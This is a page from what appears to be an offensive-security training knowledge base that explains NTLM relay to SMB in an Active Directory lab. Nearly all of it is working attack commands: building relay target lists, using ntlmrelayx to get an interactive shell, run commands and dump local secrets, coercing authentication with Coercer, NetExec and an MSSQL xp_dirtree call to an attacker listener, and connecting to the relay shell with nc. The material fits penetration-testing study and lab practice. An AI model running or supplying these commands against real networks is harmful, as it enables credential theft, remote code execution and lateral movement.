Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Relay Attacks / Techqniues

NTLM to SMB

NTLM relay to SMB is used when a target host does not require SMB signing and the relayed identity is local administrator on that host. The result is usually an interactive relay shell or command execution.

Find SMB relay targets

nxc smb 10.10.10.0/24 -u student -p 'student' --gen-relay-list smb-relay-targets.txt
cat smb-relay-targets.txt

Interactive SMB relay

ntlmrelayx.py -t smb://web01.ootw.local -smb2support -i

Connect to the relay shell

nc 127.0.0.1 11000
help
shares
use C$
ls

Relay with a command

ntlmrelayx.py -t smb://web01.ootw.local -smb2support -c 'whoami /all'

Relay to multiple SMB targets

ntlmrelayx.py -tf smb-relay-targets.txt -smb2support -i

Trigger with Coercer

coercer coerce -d ootw.local -u student -p 'student' --target 10.10.10.201 --listener 10.10.10.100

Trigger with NetExec

nxc smb 10.10.10.201 -d ootw.local -u student -p 'student' -M coerce_plus -o LISTENER=10.10.10.100

MSSQL service coercion into SMB relay

EXEC master..xp_dirtree '\\10.10.10.100\relay\test.txt',1,1;

Post-relay local secrets

ntlmrelayx.py -t smb://web01.ootw.local -smb2support --dump

Notes

If SMB signing is required on the target, this path fails. If the relayed user is not local admin, authentication can succeed but command execution will not.

SMB relay is often easiest against workstations and member servers, not domain controllers.